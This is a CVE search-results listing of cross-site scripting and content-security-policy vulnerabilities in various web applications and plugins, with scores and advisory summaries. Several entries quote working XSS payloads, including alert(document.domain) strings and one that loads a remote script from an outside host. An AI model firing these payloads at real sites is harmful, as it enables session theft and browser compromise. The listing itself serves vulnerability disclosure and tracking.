Search Results (46610 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2024-0782 | 1 Online Railway Reservation System Project | 1 Online Railway Reservation System | 2024-11-21 | 3.5 Low |
| A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability. | ||||
| CVE-2024-0726 | 1 Projectworlds | 1 Student Project Allocation System | 2024-11-21 | 4.3 Medium |
| A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability. | ||||
| CVE-2024-0720 | 1 Factominer | 1 Factoinvestigate | 2024-11-21 | 3.5 Low |
| A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0718 | 1 Liuwy-dlsdys | 1 Zhglxt | 2024-11-21 | 2.4 Low |
| A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. | ||||
| CVE-2024-0696 | 1 Atrocore | 1 Atropim | 2024-11-21 | 3.5 Low |
| A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0647 | 1 Sparksuite | 1 Simplemde | 2024-11-21 | 4.3 Medium |
| A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability. | ||||
| CVE-2024-0503 | 1 Sherlock | 1 Online Fir System | 2024-11-21 | 3.5 Low |
| A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611. | ||||
| CVE-2024-0499 | 1 Oretnom23 | 1 House Rental Management System | 2024-11-21 | 2.4 Low |
| A vulnerability, which was classified as problematic, has been found in SourceCodester House Rental Management System 1.0. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250607. | ||||
| CVE-2024-0420 | 1 Mappresspro | 2 Mappress Maps, Mappress Maps For Wordpress | 2024-11-21 | 6.1 Medium |
| The MapPress Maps for WordPress plugin before 2.88.15 does not sanitize and escape the map title when outputting it back in the admin dashboard, allowing Contributors and above roles to perform Stored Cross-Site Scripting attacks. | ||||
| CVE-2024-0346 | 1 Vehicle Booking System Project | 1 Vehicle Booking System | 2024-11-21 | 3.5 Low |
| A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability. | ||||
| CVE-2024-0318 | 1 Fireeye | 1 Hxtool | 2024-11-21 | 5.4 Medium |
| Cross-Site Scripting in FireEye HXTool affecting version 4.6. This vulnerability allows an attacker to store a specially crafted JavaScript payload in the 'Profile Name' and 'Hostname/IP' parameters that will be triggered when items are loaded. | ||||
| CVE-2024-0310 | 2 Microsoft, Trellix | 2 Windows, Endpoint Security Web Control | 2024-11-21 | 6.1 Medium |
| A content-security-policy vulnerability in ENS Control browser extension prior to 10.7.0 Update 15 allows a remote attacker to alter the response header parameter setting to switch the content security policy into report-only mode, allowing an attacker to bypass the content-security-policy configuration. | ||||
| CVE-2024-0246 | 1 Icewarp | 1 Icewarp | 2024-11-21 | 4.3 Medium |
| A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27"()%26%25<zzz><ScRiPt>alert(document.domain)</ScRiPt> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0226 | 1 Synopsys | 1 Seeker | 2024-11-21 | 4.8 Medium |
| Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload. | ||||
| CVE-2023-7173 | 1 Phpgurukul | 1 Hospital Management System | 2024-11-21 | 4.3 Medium |
| A vulnerability, which was classified as problematic, was found in PHPGurukul Hospital Management System 1.0. This affects an unknown part of the file registration.php. The manipulation of the argument First Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249357 was assigned to this vulnerability. | ||||
| CVE-2023-7171 | 1 Xxyopen | 1 Novel-plus | 2024-11-21 | 2.4 Low |
| A vulnerability was found in Novel-Plus up to 4.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java of the component Friendly Link Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named d6093d8182362422370d7eaf6c53afde9ee45215. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249307. | ||||
| CVE-2023-7166 | 1 Xxyopen | 1 Novel-plus | 2024-11-21 | 3.5 Low |
| A vulnerability classified as problematic has been found in Novel-Plus up to 4.2.0. This affects an unknown part of the file /user/updateUserInfo of the component HTTP POST Request Handler. The manipulation of the argument nickName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is c62da9bb3a9b3603014d0edb436146512631100d. It is recommended to apply a patch to fix this issue. The identifier VDB-249201 was assigned to this vulnerability. | ||||
| CVE-2023-7154 | 1 Morehubbub | 1 Hubbub Lite | 2024-11-21 | 4.8 Medium |
| The Hubbub Lite (formerly Grow Social) WordPress plugin before 1.32.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). | ||||
| CVE-2023-7149 | 1 Code-projects | 1 Qr Code Generator | 2024-11-21 | 3.5 Low |
| A vulnerability was found in code-projects QR Code Generator 1.0. It has been classified as problematic. This affects an unknown part of the file /download.php?file=author.png. The manipulation of the argument file with the input "><iMg src=N onerror=alert(document.domain)> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249153 was assigned to this vulnerability. | ||||
| CVE-2023-7136 | 1 Code-projects | 1 Record Management System | 2024-11-21 | 2.4 Low |
| A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249139. | ||||